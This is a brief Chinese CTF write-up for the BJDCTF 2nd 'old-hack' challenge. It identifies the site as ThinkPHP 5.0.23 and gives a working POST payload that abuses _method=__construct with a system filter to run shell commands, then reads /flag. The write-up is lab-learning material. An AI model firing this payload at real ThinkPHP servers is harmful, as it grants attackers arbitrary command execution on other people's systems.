[BJDCTF 2nd]old-hack -wp

技术2026-02-10 19

进入网站，看到提示，powered By THINKPHP5 知道肯定与thinkphp5有关传入一个s=1报错查看一下信息（这里要遇见过才知道，没什么技巧）版本为50.0.23

post提交

_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

触发命令执行漏洞

cat /flag

Processed: 0.009, SQL: 9